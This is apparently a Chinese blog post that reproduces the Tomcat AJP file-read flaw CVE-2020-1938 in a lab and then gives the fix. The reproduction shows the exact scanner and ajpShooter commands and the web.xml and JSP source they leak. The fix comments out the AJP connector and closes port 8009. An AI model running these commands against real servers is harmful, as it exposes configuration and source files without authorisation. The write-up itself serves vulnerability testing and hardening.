Tomcat-Ajp协议文件读取漏洞(CVE-2020-1938)

简介:利用此漏洞,可以获取和执行站点下任意文件,例如/WEB-INF/web.xml

工具:CVE-2020-1938TomcatAjpScanner.py、tomcat环境、web站点

1、漏洞复现:

python3 CVE-2020-1938TomcatAjpScanner.py 192.168.93.146
'192.168.93.146'] /woaiqiukui

开始检测第1个ip
Getting resource at ajp13://192.168.93.146:8009/woaiqiukuitest
----------------------------
[+] ip:192.168.93.146存在tomcat AJP漏洞
[+] start reading WEB_INF/web.xml:
[b'<?xml version="1.0" encoding="UTF-8"?>\r\n<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javaee" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" id="WebApp_ID" version="2.5">\r\n  <filter>\r\n    <filter-name>EncodingFilter</filter-name>\r\n    <filter-class>msl.web.filter.EncodingFilter</filter-class>\r\n  </filter>\r\n  <filter-mapping>\r\n    <filter-name>EncodingFilter</filter-name>\r\n    <url-pattern>/*</url-pattern>\r\n  </filter-mapping>\r\n  <servlet>\r\n    <description></description>\r\n    <display-name>BaseServlet</display-name>\r\n    <servlet-name>BaseServlet</servlet-name>\r\n    <servlet-class>msl.web.servlet.BaseServlet</servlet-class>\r\n  </servlet>\r\n  <servlet-mapping>\r\n    <servlet-name>BaseServlet</servlet-name>\r\n    <url-pattern>/base</url-pattern>\r\n  </servlet-mapping>\r\n  <error-page>\r\n    <error-code>500</error-code>\r\n    <location>/500.jsp</location>\r\n  </error-page>\r\n  <error-page>\r\n    <error-code>404</error-code>\r\n    <location>/404.html</location>\r\n  </error-page>\r\n <error-page>\r\n \t<error-code>400</error-code>\r\n \t<location>/400.jsp</location

 

root@kali:~/Desktop/poc/CVE-2020-1938TomcatAjpScanner-master# python3 ajpShooter.py http://192.168.93.146:8080/ 8009 /jsp/index.jsp read 

       _    _         __ _                 _            
      /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __ 
     //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
    /  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |   
    \_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|   
         |__/|_|                                        
                                                00theway,just for test
    

[<] 200 OK
[<] Set-Cookie: JSESSIONID=240A76CB98811D9E670C32AC3637636A; Path=/; HttpOnly
[<] Accept-Ranges: bytes
[<] ETag: W/"6815-1584381598000"
[<] Last-Modified: Mon, 16 Mar 2020 17:59:58 GMT
[<] Content-Type: text/html;charset=utf-8
[<] Content-Length: 6815

<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
    <%@taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>
    <%@ taglib prefix="fn" uri="http://java.sun.com/jsp/jstl/functions" %>
<!DOCTYPE html>
<html>

    <head>
        <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>WEB01</title>
        <link rel="stylesheet" href="${pageContext.request.contextPath}/css/bootstrap.min.css" type="text/css" />
        <script src="${pageContext.request.contextPath}/js/jquery-1.11.3.min.js" type="text/javascript"></script>
        <script src="${pageContext.request.contextPath}/js/bootstrap.min.js" type="text/javascript"></script>
    </head>

    <body>
        <div class="container-fluid">

            <!-- 静态包含 -->
            <%@include file="/jsp/head.jsp" %>

 

默认情况下,tomcat的serverl.xml对ajp的开放状态,如果此时你的防火墙也开放了对应的8009端口,就可以被攻击者利用此漏洞

    <!-- Define an AJP 1.3 Connector on port 8009 -->
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /> 

2、修复建议

将上述server.xml中AJP配置注释掉,重启tomcat,或者防火墙关闭对应的8009端口。

 <!-- Define an AJP 1.3 Connector on port 8009 -->
 <!-- <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /> -->

复测发现已经修复

root@kali:~/Desktop/poc/CVE-2020-1938TomcatAjpScanner-master# python3 CVE-2020-1938TomcatAjpScanner.py 192.168.93.146
['192.168.93.146'] /woaiqiukui

开始检测第1个ip
[Errno 111] Connection refused
Getting resource at ajp13://192.168.93.146:8009/woaiqiukuitest
[-] 测试ip:192.168.93.146/woaiqiukuitest,[Errno 32] Broken pipe无法连接,原因可能为AJP协议支持端口已关闭

[Errno 32] Broken pipe

防火墙配置,删除/etc/sysconfig/iptables的8009端口配置,然后service iptables restart重启防火墙

-A INPUT -p tcp -m tcp --dport 8009 -j ACCEPT

 

posted @ 2020-03-18 12:16  马帅领  阅读(3347)  评论(0编辑  收藏  举报